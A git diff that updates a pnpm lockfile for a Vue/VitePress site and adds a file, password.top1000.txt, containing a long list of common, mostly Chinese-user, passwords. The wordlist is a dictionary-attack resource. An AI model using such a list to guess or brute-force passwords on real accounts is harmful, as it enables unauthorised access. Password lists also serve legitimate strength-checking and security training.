element-plus@2.13.3(vue@3.5.29(typescript@5.9.3)): + dotenv@17.4.2: {} + + element-plus@2.14.2(vue@3.5.39(typescript@6.0.3)): dependencies: - '@ctrl/tinycolor': 3.6.1 - '@element-plus/icons-vue': 2.3.2(vue@3.5.29(typescript@5.9.3)) - '@floating-ui/dom': 1.7.4 + '@ctrl/tinycolor': 4.2.0 + '@element-plus/icons-vue': 2.3.2(vue@3.5.39(typescript@6.0.3)) + '@floating-ui/dom': 1.7.6 '@popperjs/core': '@sxzz/popperjs-es@2.11.8' - '@types/lodash': 4.17.23 + '@types/lodash': 4.17.24 '@types/lodash-es': 4.17.12 - '@vueuse/core': 10.11.1(vue@3.5.29(typescript@5.9.3)) + '@vueuse/core': 14.3.0(vue@3.5.39(typescript@6.0.3)) async-validator: 4.2.5 - dayjs: 1.11.19 - lodash: 4.17.23 - lodash-es: 4.17.23 - lodash-unified: 1.0.3(@types/lodash-es@4.17.12)(lodash-es@4.17.23)(lodash@4.17.23) + dayjs: 1.11.21 + lodash: 4.18.1 + lodash-es: 4.18.1 + lodash-unified: 1.0.3(@types/lodash-es@4.17.12)(lodash-es@4.18.1)(lodash@4.18.1) memoize-one: 6.0.0 normalize-wheel-es: 1.2.0 - vue: 3.5.29(typescript@5.9.3) - transitivePeerDependencies: - - '@vue/composition-api' + vue: 3.5.39(typescript@6.0.3) + vue-component-type-helpers: 3.3.6 emoji-regex-xs@1.0.0: {} - entities@2.2.0: {} - entities@4.5.0: {} entities@7.0.1: {} - es-module-lexer@1.7.0: {} + errx@0.1.0: {} + + es-module-lexer@2.3.0: {} esbuild@0.21.5: optionalDependencies: @@ -2322,26 +2864,36 @@ snapshots: '@esbuild/win32-ia32': 0.21.5 '@esbuild/win32-x64': 0.21.5 - escape-goat@3.0.0: {} - - esm@3.2.25: {} + escape-string-regexp@5.0.0: {} estree-walker@2.0.2: {} + estree-walker@3.0.3: + dependencies: + '@types/estree': 1.0.9 + + exsolve@1.1.0: {} + + fdir@6.5.0(picomatch@4.0.5): + optionalDependencies: + picomatch: 4.0.5 + fill-range@7.1.1: dependencies: to-regex-range: 5.0.1 focus-trap@7.8.0: dependencies: - tabbable: 6.4.0 + tabbable: 6.5.0 fsevents@2.3.3: optional: true + giget@3.3.0: {} + giscus@1.6.0: dependencies: - lit: 3.3.2 + lit: 3.3.3 glob-parent@5.1.2: dependencies: @@ -2358,7 +2910,7 @@ snapshots: hast-util-whitespace: 3.0.0 html-void-elements: 3.0.0 mdast-util-to-hast: 13.2.1 - property-information: 7.1.0 + property-information: 7.2.0 space-separated-tokens: 2.0.2 stringify-entities: 4.0.4 zwitch: 2.0.4 @@ -2367,29 +2919,15 @@ snapshots: dependencies: '@types/hast': 3.0.4 - he@1.2.0: {} - hookable@5.5.3: {} html-void-elements@3.0.0: {} - htmlparser2@5.0.1: - dependencies: - domelementtype: 2.3.0 - domhandler: 3.3.0 - domutils: 2.8.0 - entities: 2.2.0 - - htmlparser2@6.1.0: - dependencies: - domelementtype: 2.3.0 - domhandler: 4.3.1 - domutils: 2.8.0 - entities: 2.2.0 - ignore-by-default@1.0.1: {} - immutable@4.3.8: {} + ignore@7.0.5: {} + + immutable@5.1.9: {} is-binary-path@2.1.0: dependencies: @@ -2405,41 +2943,86 @@ snapshots: is-what@5.5.0: {} - juice@8.1.0: + jiti@2.7.0: {} + + klona@2.0.6: {} + + knitwork@1.3.0: {} + + lightningcss-android-arm64@1.32.0: + optional: true + + lightningcss-darwin-arm64@1.32.0: + optional: true + + lightningcss-darwin-x64@1.32.0: + optional: true + + lightningcss-freebsd-x64@1.32.0: + optional: true + + lightningcss-linux-arm-gnueabihf@1.32.0: + optional: true + + lightningcss-linux-arm64-gnu@1.32.0: + optional: true + + lightningcss-linux-arm64-musl@1.32.0: + optional: true + + lightningcss-linux-x64-gnu@1.32.0: + optional: true + + lightningcss-linux-x64-musl@1.32.0: + optional: true + + lightningcss-win32-arm64-msvc@1.32.0: + optional: true + + lightningcss-win32-x64-msvc@1.32.0: + optional: true + + lightningcss@1.32.0: dependencies: - cheerio: 1.0.0-rc.10 - commander: 6.2.1 - mensch: 0.3.4 - slick: 1.12.2 - web-resource-inliner: 6.0.1 - transitivePeerDependencies: - - encoding + detect-libc: 2.1.2 + optionalDependencies: + lightningcss-android-arm64: 1.32.0 + lightningcss-darwin-arm64: 1.32.0 + lightningcss-darwin-x64: 1.32.0 + lightningcss-freebsd-x64: 1.32.0 + lightningcss-linux-arm-gnueabihf: 1.32.0 + lightningcss-linux-arm64-gnu: 1.32.0 + lightningcss-linux-arm64-musl: 1.32.0 + lightningcss-linux-x64-gnu: 1.32.0 + lightningcss-linux-x64-musl: 1.32.0 + lightningcss-win32-arm64-msvc: 1.32.0 + lightningcss-win32-x64-msvc: 1.32.0 lit-element@4.2.2: dependencies: - '@lit-labs/ssr-dom-shim': 1.5.1 + '@lit-labs/ssr-dom-shim': 1.6.0 '@lit/reactive-element': 2.1.2 - lit-html: 3.3.2 + lit-html: 3.3.3 - lit-html@3.3.2: + lit-html@3.3.3: dependencies: '@types/trusted-types': 2.0.7 - lit@3.3.2: + lit@3.3.3: dependencies: '@lit/reactive-element': 2.1.2 lit-element: 4.2.2 - lit-html: 3.3.2 + lit-html: 3.3.3 - lodash-es@4.17.23: {} + lodash-es@4.18.1: {} - lodash-unified@1.0.3(@types/lodash-es@4.17.12)(lodash-es@4.17.23)(lodash@4.17.23): + lodash-unified@1.0.3(@types/lodash-es@4.17.12)(lodash-es@4.18.1)(lodash@4.18.1): dependencies: '@types/lodash-es': 4.17.12 - lodash: 4.17.23 - lodash-es: 4.17.23 + lodash: 4.18.1 + lodash-es: 4.18.1 - lodash@4.17.23: {} + lodash@4.18.1: {} magic-string@0.30.21: dependencies: @@ -2447,30 +3030,23 @@ snapshots: mark.js@8.11.1: {} - markdown-it-mathjax3@4.3.2: + markdown-it-mathjax3@5.2.0: dependencies: - juice: 8.1.0 - mathjax-full: 3.2.2 - transitivePeerDependencies: - - encoding + '@se-oss/deasync': 1.0.1 + mathxyjax3: 0.8.3 - mathjax-full@3.2.2: - dependencies: - esm: 3.2.25 - mhchemparser: 4.2.1 - mj-context-menu: 0.6.1 - speech-rule-engine: 4.1.2 + mathxyjax3@0.8.3: {} mdast-util-to-hast@13.2.1: dependencies: '@types/hast': 3.0.4 '@types/mdast': 4.0.4 - '@ungap/structured-clone': 1.3.0 + '@ungap/structured-clone': 1.3.2 devlop: 1.1.0 micromark-util-sanitize-uri: 2.0.1 trim-lines: 3.0.1 unist-util-position: 5.0.0 - unist-util-visit: 5.0.0 + unist-util-visit: 5.1.0 vfile: 6.0.3 mdn-data@2.0.28: {} @@ -2479,10 +3055,6 @@ snapshots: memoize-one@6.0.0: {} - mensch@0.3.4: {} - - mhchemparser@4.2.1: {} - micromark-util-character@2.1.1: dependencies: micromark-util-symbol: 2.0.1 @@ -2500,40 +3072,38 @@ snapshots: micromark-util-types@2.0.2: {} - mime@2.6.0: {} - - minimatch@10.2.3: - dependencies: - brace-expansion: 5.0.3 - - minimatch@9.0.7: + minimatch@10.2.5: dependencies: - brace-expansion: 5.0.3 + brace-expansion: 5.0.7 minisearch@7.2.0: {} mitt@3.0.1: {} - mj-context-menu@0.6.1: {} + mlly@1.8.2: + dependencies: + acorn: 8.17.0 + pathe: 2.0.3 + pkg-types: 1.3.1 + ufo: 1.6.4 ms@2.1.3: {} muggle-string@0.4.1: {} - nanoid@3.3.11: {} + nanoid@3.3.15: {} - node-fetch@2.7.0: - dependencies: - whatwg-url: 5.0.0 + node-addon-api@7.1.1: + optional: true nodemon@3.1.14: dependencies: chokidar: 3.6.0 debug: 4.4.3(supports-color@5.5.0) ignore-by-default: 1.0.1 - minimatch: 10.2.3 + minimatch: 10.2.5 pstree.remy: 1.1.8 - semver: 7.7.3 + semver: 7.8.5 simple-update-notifier: 2.0.0 supports-color: 5.5.0 touch: 3.1.1 @@ -2547,45 +3117,64 @@ snapshots: dependencies: boolbase: 1.0.0 + ohash@2.0.11: {} + oniguruma-to-es@3.1.1: dependencies: emoji-regex-xs: 1.0.0 regex: 6.1.0 regex-recursion: 6.0.2 - parse5-htmlparser2-tree-adapter@6.0.1: - dependencies: - parse5: 6.0.1 - - parse5@6.0.1: {} - path-browserify@1.0.1: {} + pathe@2.0.3: {} + perfect-debounce@1.0.0: {} + perfect-debounce@2.1.0: {} + picocolors@1.1.1: {} - picomatch@2.3.1: {} + picomatch@2.3.2: {} + + picomatch@4.0.5: {} + + pkg-types@1.3.1: + dependencies: + confbox: 0.1.8 + mlly: 1.8.2 + pathe: 2.0.3 - picomatch@4.0.3: {} + pkg-types@2.3.1: + dependencies: + confbox: 0.2.4 + exsolve: 1.1.0 + pathe: 2.0.3 - postcss@8.5.6: + postcss@8.5.16: dependencies: - nanoid: 3.3.11 + nanoid: 3.3.15 picocolors: 1.1.1 source-map-js: 1.2.1 - preact@10.28.2: {} + preact@10.29.4: {} prettier@3.5.2: {} - property-information@7.1.0: {} + property-information@7.2.0: {} pstree.remy@1.1.8: {} + rc9@3.0.1: + dependencies: + defu: 6.1.7 + destr: 2.0.5 + readdirp@3.6.0: dependencies: - picomatch: 2.3.1 + picomatch: 2.3.2 + + readdirp@5.0.0: {} regex-recursion@6.0.2: dependencies: @@ -2599,48 +3188,77 @@ snapshots: rfdc@1.4.1: {} - rollup@4.59.0: + rolldown-string@0.2.1: dependencies: - '@types/estree': 1.0.8 + magic-string: 0.30.21 + + rolldown@1.1.4: + dependencies: + '@oxc-project/types': 0.138.0 + '@rolldown/pluginutils': 1.0.1 + optionalDependencies: + '@rolldown/binding-android-arm64': 1.1.4 + '@rolldown/binding-darwin-arm64': 1.1.4 + '@rolldown/binding-darwin-x64': 1.1.4 + '@rolldown/binding-freebsd-x64': 1.1.4 + '@rolldown/binding-linux-arm-gnueabihf': 1.1.4 + '@rolldown/binding-linux-arm64-gnu': 1.1.4 + '@rolldown/binding-linux-arm64-musl': 1.1.4 + '@rolldown/binding-linux-ppc64-gnu': 1.1.4 + '@rolldown/binding-linux-s390x-gnu': 1.1.4 + '@rolldown/binding-linux-x64-gnu': 1.1.4 + '@rolldown/binding-linux-x64-musl': 1.1.4 + '@rolldown/binding-openharmony-arm64': 1.1.4 + '@rolldown/binding-wasm32-wasi': 1.1.4 + '@rolldown/binding-win32-arm64-msvc': 1.1.4 + '@rolldown/binding-win32-x64-msvc': 1.1.4 + + rollup@4.62.2: + dependencies: + '@types/estree': 1.0.9 optionalDependencies: - '@rollup/rollup-android-arm-eabi': 4.59.0 - '@rollup/rollup-android-arm64': 4.59.0 - '@rollup/rollup-darwin-arm64': 4.59.0 - '@rollup/rollup-darwin-x64': 4.59.0 - '@rollup/rollup-freebsd-arm64': 4.59.0 - '@rollup/rollup-freebsd-x64': 4.59.0 - '@rollup/rollup-linux-arm-gnueabihf': 4.59.0 - '@rollup/rollup-linux-arm-musleabihf': 4.59.0 - '@rollup/rollup-linux-arm64-gnu': 4.59.0 - '@rollup/rollup-linux-arm64-musl': 4.59.0 - '@rollup/rollup-linux-loong64-gnu': 4.59.0 - '@rollup/rollup-linux-loong64-musl': 4.59.0 - '@rollup/rollup-linux-ppc64-gnu': 4.59.0 - '@rollup/rollup-linux-ppc64-musl': 4.59.0 - '@rollup/rollup-linux-riscv64-gnu': 4.59.0 - '@rollup/rollup-linux-riscv64-musl': 4.59.0 - '@rollup/rollup-linux-s390x-gnu': 4.59.0 - '@rollup/rollup-linux-x64-gnu': 4.59.0 - '@rollup/rollup-linux-x64-musl': 4.59.0 - '@rollup/rollup-openbsd-x64': 4.59.0 - '@rollup/rollup-openharmony-arm64': 4.59.0 - '@rollup/rollup-win32-arm64-msvc': 4.59.0 - '@rollup/rollup-win32-ia32-msvc': 4.59.0 - '@rollup/rollup-win32-x64-gnu': 4.59.0 - '@rollup/rollup-win32-x64-msvc': 4.59.0 + '@rollup/rollup-android-arm-eabi': 4.62.2 + '@rollup/rollup-android-arm64': 4.62.2 + '@rollup/rollup-darwin-arm64': 4.62.2 + '@rollup/rollup-darwin-x64': 4.62.2 + '@rollup/rollup-freebsd-arm64': 4.62.2 + '@rollup/rollup-freebsd-x64': 4.62.2 + '@rollup/rollup-linux-arm-gnueabihf': 4.62.2 + '@rollup/rollup-linux-arm-musleabihf': 4.62.2 + '@rollup/rollup-linux-arm64-gnu': 4.62.2 + '@rollup/rollup-linux-arm64-musl': 4.62.2 + '@rollup/rollup-linux-loong64-gnu': 4.62.2 + '@rollup/rollup-linux-loong64-musl': 4.62.2 + '@rollup/rollup-linux-ppc64-gnu': 4.62.2 + '@rollup/rollup-linux-ppc64-musl': 4.62.2 + '@rollup/rollup-linux-riscv64-gnu': 4.62.2 + '@rollup/rollup-linux-riscv64-musl': 4.62.2 + '@rollup/rollup-linux-s390x-gnu': 4.62.2 + '@rollup/rollup-linux-x64-gnu': 4.62.2 + '@rollup/rollup-linux-x64-musl': 4.62.2 + '@rollup/rollup-openbsd-x64': 4.62.2 + '@rollup/rollup-openharmony-arm64': 4.62.2 + '@rollup/rollup-win32-arm64-msvc': 4.62.2 + '@rollup/rollup-win32-ia32-msvc': 4.62.2 + '@rollup/rollup-win32-x64-gnu': 4.62.2 + '@rollup/rollup-win32-x64-msvc': 4.62.2 fsevents: 2.3.3 - sass@1.76.0: + sass@1.101.0: dependencies: - chokidar: 3.6.0 - immutable: 4.3.8 + chokidar: 5.0.0 + immutable: 5.1.9 source-map-js: 1.2.1 + optionalDependencies: + '@parcel/watcher': 2.5.6 - sax@1.5.0: {} + sax@1.6.0: {} + + scule@1.3.0: {} search-insights@2.15.0: {} - semver@7.7.3: {} + semver@7.8.5: {} shiki@2.5.0: dependencies: @@ -2655,9 +3273,7 @@ snapshots: simple-update-notifier@2.0.0: dependencies: - semver: 7.7.3 - - slick@1.12.2: {} + semver: 7.8.5 source-map-js@1.2.1: {} @@ -2665,12 +3281,6 @@ snapshots: speakingurl@14.0.1: {} - speech-rule-engine@4.1.2: - dependencies: - '@xmldom/xmldom': 0.9.8 - commander: 13.1.0 - wicked-good-xpath: 1.3.0 - stringify-entities@4.0.4: dependencies: character-entities-html4: 2.1.0 @@ -2692,9 +3302,14 @@ snapshots: css-what: 6.2.2 csso: 5.0.5 picocolors: 1.1.1 - sax: 1.5.0 + sax: 1.6.0 - tabbable@6.4.0: {} + tabbable@6.5.0: {} + + tinyglobby@0.2.17: + dependencies: + fdir: 6.5.0(picomatch@4.0.5) + picomatch: 4.0.5 to-regex-range@5.0.1: dependencies: @@ -2702,17 +3317,27 @@ snapshots: touch@3.1.1: {} - tr46@0.0.3: {} - trim-lines@3.0.1: {} - tslib@2.8.1: {} + tslib@2.8.1: + optional: true + + type-fest@4.41.0: {} - typescript@5.9.3: {} + typescript@6.0.3: {} + + ufo@1.6.4: {} + + unctx@2.5.0: + dependencies: + acorn: 8.17.0 + estree-walker: 3.0.3 + magic-string: 0.30.21 + unplugin: 2.3.11 undefsafe@2.0.5: {} - undici-types@6.21.0: {} + undici-types@8.3.0: {} unist-util-is@6.0.1: dependencies: @@ -2731,27 +3356,36 @@ snapshots: '@types/unist': 3.0.3 unist-util-is: 6.0.1 - unist-util-visit@5.0.0: + unist-util-visit@5.1.0: dependencies: '@types/unist': 3.0.3 unist-util-is: 6.0.1 unist-util-visit-parents: 6.0.2 - unplugin-element-plus@0.8.0(rollup@4.59.0): + unplugin-element-plus@0.11.2: dependencies: - '@rollup/pluginutils': 5.3.0(rollup@4.59.0) - es-module-lexer: 1.7.0 - magic-string: 0.30.21 - unplugin: 1.16.1 + '@nuxt/kit': 4.4.8 + es-module-lexer: 2.3.0 + escape-string-regexp: 5.0.0 + rolldown-string: 0.2.1 + unplugin: 2.3.11 transitivePeerDependencies: - - rollup + - magicast - unplugin@1.16.1: + unplugin@2.3.11: dependencies: - acorn: 8.15.0 + '@jridgewell/remapping': 2.3.5 + acorn: 8.17.0 + picomatch: 4.0.5 webpack-virtual-modules: 0.6.2 - valid-data-url@3.0.1: {} + untyped@2.0.0: + dependencies: + citty: 0.1.6 + defu: 6.1.7 + jiti: 2.7.0 + knitwork: 1.3.0 + scule: 1.3.0 vfile-message@4.0.3: dependencies: @@ -2763,44 +3397,62 @@ snapshots: '@types/unist': 3.0.3 vfile-message: 4.0.3 - vite-svg-loader@5.1.0(vue@3.5.29(typescript@5.9.3)): + vite-svg-loader@5.1.1(vue@3.5.39(typescript@6.0.3)): dependencies: + debug: 4.4.3(supports-color@5.5.0) svgo: 3.3.3 - vue: 3.5.29(typescript@5.9.3) + vue: 3.5.39(typescript@6.0.3) + transitivePeerDependencies: + - supports-color - vite@5.4.21(@types/node@22.19.13)(sass@1.76.0): + vite@5.4.21(@types/node@26.1.0)(lightningcss@1.32.0)(sass@1.101.0): dependencies: esbuild: 0.21.5 - postcss: 8.5.6 - rollup: 4.59.0 + postcss: 8.5.16 + rollup: 4.62.2 + optionalDependencies: + '@types/node': 26.1.0 + fsevents: 2.3.3 + lightningcss: 1.32.0 + sass: 1.101.0 + + vite@8.1.3(@types/node@26.1.0)(jiti@2.7.0)(sass@1.101.0)(yaml@2.9.0): + dependencies: + lightningcss: 1.32.0 + picomatch: 4.0.5 + postcss: 8.5.16 + rolldown: 1.1.4 + tinyglobby: 0.2.17 optionalDependencies: - '@types/node': 22.19.13 + '@types/node': 26.1.0 fsevents: 2.3.3 - sass: 1.76.0 + jiti: 2.7.0 + sass: 1.101.0 + yaml: 2.9.0 - vitepress@1.6.4(@algolia/client-search@5.47.0)(@types/node@22.19.13)(async-validator@4.2.5)(markdown-it-mathjax3@4.3.2)(postcss@8.5.6)(sass@1.76.0)(search-insights@2.15.0)(typescript@5.9.3): + vitepress@1.6.4(@algolia/client-search@5.55.1)(@types/node@26.1.0)(async-validator@4.2.5)(lightningcss@1.32.0)(markdown-it-mathjax3@5.2.0)(postcss@8.5.16)(sass@1.101.0)(search-insights@2.15.0)(typescript@6.0.3): dependencies: '@docsearch/css': 3.8.2 - '@docsearch/js': 3.8.2(@algolia/client-search@5.47.0)(search-insights@2.15.0) - '@iconify-json/simple-icons': 1.2.67 + '@docsearch/js': 3.8.2(@algolia/client-search@5.55.1)(search-insights@2.15.0) + '@iconify-json/simple-icons': 1.2.88 '@shikijs/core': 2.5.0 '@shikijs/transformers': 2.5.0 '@shikijs/types': 2.5.0 '@types/markdown-it': 14.1.2 - '@vitejs/plugin-vue': 5.2.4(vite@5.4.21(@types/node@22.19.13)(sass@1.76.0))(vue@3.5.29(typescript@5.9.3)) - '@vue/devtools-api': 7.7.9 - '@vue/shared': 3.5.27 - '@vueuse/core': 12.8.2(typescript@5.9.3) - '@vueuse/integrations': 12.8.2(async-validator@4.2.5)(focus-trap@7.8.0)(typescript@5.9.3) + '@vitejs/plugin-vue': 5.2.4(vite@5.4.21(@types/node@26.1.0)(lightningcss@1.32.0)(sass@1.101.0))(vue@3.5.39(typescript@6.0.3)) + '@vue/devtools-api': 7.7.10 + '@vue/shared': 3.5.39 + '@vueuse/core': 12.8.2(typescript@6.0.3) + '@vueuse/integrations': 12.8.2(async-validator@4.2.5)(focus-trap@7.8.0)(typescript@6.0.3) focus-trap: 7.8.0 mark.js: 8.11.1 minisearch: 7.2.0 shiki: 2.5.0 - vite: 5.4.21(@types/node@22.19.13)(sass@1.76.0) - vue: 3.5.29(typescript@5.9.3) + vite: 5.4.21(@types/node@26.1.0)(lightningcss@1.32.0)(sass@1.101.0) + vue: 3.5.39(typescript@6.0.3) optionalDependencies: - markdown-it-mathjax3: 4.3.2 - postcss: 8.5.6 + markdown-it-mathjax3: 5.2.0 + postcss: 8.5.16 transitivePeerDependencies: - '@algolia/client-search' - '@types/node' @@ -2830,48 +3482,26 @@ snapshots: vscode-uri@3.1.0: {} - vue-demi@0.14.10(vue@3.5.29(typescript@5.9.3)): - dependencies: - vue: 3.5.29(typescript@5.9.3) + vue-component-type-helpers@3.3.6: {} - vue-tsc@2.2.12(typescript@5.9.3): + vue-tsc@3.3.6(typescript@6.0.3): dependencies: - '@volar/typescript': 2.4.15 - '@vue/language-core': 2.2.12(typescript@5.9.3) - typescript: 5.9.3 + '@volar/typescript': 2.4.28 + '@vue/language-core': 3.3.6 + typescript: 6.0.3 - vue@3.5.29(typescript@5.9.3): + vue@3.5.39(typescript@6.0.3): dependencies: - '@vue/compiler-dom': 3.5.29 - '@vue/compiler-sfc': 3.5.29 - '@vue/runtime-dom': 3.5.29 - '@vue/server-renderer': 3.5.29(vue@3.5.29(typescript@5.9.3)) - '@vue/shared': 3.5.29 + '@vue/compiler-dom': 3.5.39 + '@vue/compiler-sfc': 3.5.39 + '@vue/runtime-dom': 3.5.39 + '@vue/server-renderer': 3.5.39(vue@3.5.39(typescript@6.0.3)) + '@vue/shared': 3.5.39 optionalDependencies: - typescript: 5.9.3 - - web-resource-inliner@6.0.1: - dependencies: - ansi-colors: 4.1.3 - escape-goat: 3.0.0 - htmlparser2: 5.0.1 - mime: 2.6.0 - node-fetch: 2.7.0 - valid-data-url: 3.0.1 - transitivePeerDependencies: - - encoding - - webidl-conversions@3.0.1: {} + typescript: 6.0.3 webpack-virtual-modules@0.6.2: {} - whatwg-url@5.0.0: - dependencies: - tr46: 0.0.3 - webidl-conversions: 3.0.1 - - wicked-good-xpath@1.3.0: {} - - yaml@2.8.2: {} + yaml@2.9.0: {} zwitch@2.0.4: {} diff --git a/public/resources/wp25/password.top1000.txt b/public/resources/wp25/password.top1000.txt new file mode 100644 index 0000000..68ddd76 --- /dev/null +++ b/public/resources/wp25/password.top1000.txt @@ -0,0 +1,13916 @@ +123456 +a123456 +woaini1314 +qq123456 +1qaz2wsx +123456a +1q2w3e4r +111111 +5201314 +woaini123 +123qwe +123123 +woaini520 +a123456789 +000000 +123456aa +abcd1234 +123456789a +asd123456 +qwe123 +aini1314 +zhang123 +woaini521 +asd123 +aa123456 +1234qwer +123456qq +1q2w3e4r5t +7758521 +123456abc +123456789 +q1w2e3r4 +abc123456 +1qazxsw2 +qwer1234 +abc123 +123qweasd +123321 +a5201314 +1314520 +q123456 +zxc123 +asdf1234 +zxcvbnm123 +z123456 +a123123 +love1314 +100200 +qq123123 +123456asd +1234abcd +123abc +5211314 +as123456 +12qwaszx +5201314a +qazwsx123 +qwe123456 +woaini +520520 +1q2w3e +w123456 +qaz123 +1a2b3c4d +a1314520 +qq5201314 +123456aaa +zxc123456 +qaz123456 +123456qwe +li123456 +q1w2e3r4t5 +123456q +112233 +110110 +666666 +nihao123 +a111111 +a7758521 +zx123456 +a1234567 +a1b2c3d4 +123654 +a123456a +159357 +521521 +7758258 +7758521a +12345qwert +201314 +wang123456 +caonima123 +123asd +aaa123456 +31415926 +zz123456 +aa123123 +qw123456 +liu123456 +jiang123 +a000000 +123456789q +1234567a +a12345678 +qwert12345 +1314521 +laopo521 +211314 +qweasd123 +laopo520 +147258 +baobei520 +584520 +woshi123 +159753 +12345678a +123456z +a12345 +iloveyou +123123a +qq111111 +111111a +l123456 +123456zxc +a1s2d3f4 +123456as +zaq12wsx +123qwe123 +z123456789 +asdf123456 +abcd123456 +zhang520 +aaa123 +q123456789 +1314520a +aaa111 +123456zz +123123qq +456852 +zxcvbnm +baobao520 +qq1314520 +qwe123qwe +314159 +hao123 +s123456 +asdasd123 +12345ssdlh +123qweasdzxc +asdasd +q1w2e3 +www123456 +123456qaz +1qaz1qaz +131421 +woaiwojia +123123aa +a5211314 +121212 +beijing2008 +888888 +123000 +x123456 +12345abcde +12345678 +zhang123456 +a7758258 +1234asdf +000000a +5201314qq +qq000000 +yy123456 +654321 +wo123456 +abcde12345 +qq7758521 +1234567890 +happy123 +123456ab +123456qw +asdqwe123 +qq123456789 +25257758 +asdf123 +windows +584521 +123456789z +1qaz2wsx3edc +110120 +wang1234 +112358 +zaq1xsw2 +ab123456 +1123581321 +apple123 +zxcv1234 +liu123 +1a2s3d4f +110119 +yu123456 +baobei521 +mima123 +1234567 +11111111 +123zxc +w123456789 +aaaa1111 +123456abcd +chen123456 +qweqwe123 +qq123321 +xx123456 +123456ok +a123321 +liang123 +w5201314 +123qaz +jordan23 +huang520 +iloveyou1314 +asd123123 +mm123456 +ww123456 +131420 +1a2b3c +mimashi123 +zheng123 +abc12345 +111222 +a1314521 +5211314a +147258369 +chen123 +753951 +zhang1987 +zy123456 +cc123456 +qqq111 +7758520 +a123123123 +q5201314 +666888 +zhuzhu520 +wang1989 +q123123 +a1b2c3d4e5 +qq1234 +wang1987 +abc123456789 +251314 +woaini88 +521125 +windows98 +123456789abc +qwe123123 +1314woaini +qazwsx +z5201314 +weiwei520 +1a2b3c4d5e +Aa123456 +q111111 +88888888 +woaini110 +168168 +123123123 +123mutouren +wu123456 +wq123456 +102030 +zhang521 +cheng123 +778899 +zj123456 +zhang1989 +yangyang +ss123456 +maomao123 +111qqq +123123qwe +123698745 +3.1415926 +yang123456 +ws123456 +loveyou1314 +aaaaaa +a1111111 +woaini11 +123456li +passw0rd +admin123 +zhang1990 +aiziji1314 +h123456 +222222 +woshini88 +yang123 +asd123asd +happy1314 +qwerty123 +xingfu1314 +ll123456 +521314 +321321 +lin123456 +123456zx +123456w +123456789qq +333333 +ly123456 +buzhidao +qwer123456 +m123456 +999999 +z123123 +123456yy +1111111a +qqqq1111 +qwe12345 +1qa2ws3ed +asdfasdf +123456asdf +5845211314 +123abc456 +love5201314 +123456mm +564335 +456123 +www123 +woaini3344 +xu123456 +wangwei123 +111111q +xiaoxiao +c123456 +xiaoyu520 +jiang520 +baobao521 +sun123456 +962464 +iverson3 +lj123456 +love520 +111aaa +1314521a +123789 +zh123456 +qq112233 +7777777 +zl123456 +7758521qq +love8023 +woshishui +chen1234 +1q2w3e4r5t6y +11111111a +zhang1985 +love123456 +hello123 +w7758521 +abcdefg123 +3344520 +123abc123 +520530 +789456 +a123a123 +123a123a +qwert123 +abcd123 +a11111 +yy5201314 +angel520 +7895123 +baobao123 +zhang110 +12345a +woaini99 +101010 +q1314520 +123456ww +1q1q1q +112233aa +love123 +135246 +xiang123 +7758258a +chen1987 +liuyang123 +111111qq +00000000 +123456cc +951753 +liwei123 +y123456 +z1314520 +asdfg12345 +121314 +hh123456 +shanghai1943 +hu123456 +q7758521 +wei123456 +qwerty +woshi007 +123aaa +xiaoyu521 +123321qq +qqq123456 +zc123456 +qq5211314 +liang520 +5201314q +bb123456 +123321aa +1314520qq +password +110120119 +qwe123asd +zq123456 +555555 +qazxsw123 +zaq123 +520025 +woaiwojia1314 +duibuqi520 +123456ss +woaini12 +123123123a +518518 +3344521 +1111aaaa +123456xx +iloveyou123 +a1s2d3f4g5 +qwaszx123 +qweqwe +woshishui1 +qq7758258 +aa5201314 +a00000 +dd123456 +iloveyou520 +iloveyou1 +a1230123 +weiwei123 +wang1314 +xx5201314 +wj123456 +a123654 +wangyu123 +gao123456 +mm5201314 +ma123456 +123321a +cs123456 +123456tt +1111qqqq +wang1984 +zx5201314 +qq520520 +123woaini +zxc123123 +q1234567 +qiang123 +qwer123 +1111111 +010203 +wz123456 +qweasd +336699 +123456qqq +123asd123 +a0000000 +xiao123 +1314love +china123 +123456x +zhu123456 +520123 +qqq123 +wokao123 +369369 +zw123456 +zhao123456 +a11111111 +asd456 +woaini00 +asd12345 +11223344 +chen1988 +12301230 +a110110 +520woaini +wenwen520 +ok123456 +7788521 +123456ll +abcd12345 +weiwei521 +yang1989 +1q1q1q1q +wanglei123 +zhuzhu123 +pp123456 +wx123456 +kissme123 +wy123456 +123123q +qaz12345 +qq1314521 +1234567q +a123456b +xiao123456 +789456123 +zhang1234 +xiaoyu123 +asdfg123 +babamama520 +111000 +yang1234 +nihaoma123 +qwerty123456 +zhao123 +az123456 +jj123456 +dandan520 +zhou123456 +123456789w +258258 +123456l +584131421 +123456789aa +a00000000 +zxcv123 +ai123456 +woaiwojia123 +aa112233 +123456qwerty +wojiushiwo +123520 +123456liu +caonima1 +hy123456 +1234560a +feifei123 +1234560 +123456yu +134679 +x5201314 +angel123 +12345abc +tt123456 +zhang12345 +147852 +long123456 +mima123456 +qq1234567 +q1111111 +xy123456 +007007 +a88888888 +caonima +as123123 +zhang1314 +a1b2c3 +kk123456 +woaini2008 +cy123456 +asdfgh +cx123456 +cc5201314 +asdfghjkl123 +111111aa +zhong123 +lx123456 +000000aa +142536 +qq110110 +911911 +521woaini +0o0o0o0o +1230123 +woshi110 +wang1991 +584131420 +a1234560 +zaq123456 +1a2s3d4f5g +woaini1234 +xinxin123 +xz123456 +852456 +qqqqqq +kuaile123 +zs123456 +qweasdzxc123 +jingjing +wan1314 +forever +wangwei +he123456 +a112233 +741852 +a147258369 +woaini5201314 +1qazzaq1 +123123aaa +7758521q +123456s +q12345 +asdzxc123 +1234567890a +xiaozhu520 +zhangwei +qq123654 +123456wang +zxcvbnm1 +f123456 +qwe789 +lin123 +258369 +1314aini +abc123123 +963852 +zz123123 +wl123456 +long123 +a12301230 +loveme1314 +g123456 +wocao123 +321654 +li5201314 +l123456789 +zz5201314 +aa123456789 +forever520 +t123456 +woaini13 +love2008 +hj123456 +123a456b +lh123456 +wenwen123 +baobei123 +aaa000 +lc123456 +sz123456 +lu123456 +5213344 +123456. +liyang123 +zx123123 +zxcvb123 +123457 +qw123123 +a520520 +120120 +buzhidao123 +asdf12345 +142857 +superjunior13 +qq12345 +12345asdfg +258456 +j123456 +123456789o +kuaile1314 +123456m +wocaonima1 +3141592653 +122333 +s123456789 +guo123456 +123456789l +woaiwojia1 +z000000 +5201314z +aa111111 +sun123 +love1234 +124578 +12369874 +yanzi520 +5841314520 +shuai123 +d123456 +qq521521 +woainima +q123456q +654123 +w5211314 +zhanglei +sy123456 +232323 +119119 +admin888 +w1314520 +5201314aa +haha123 +789789 +q11111 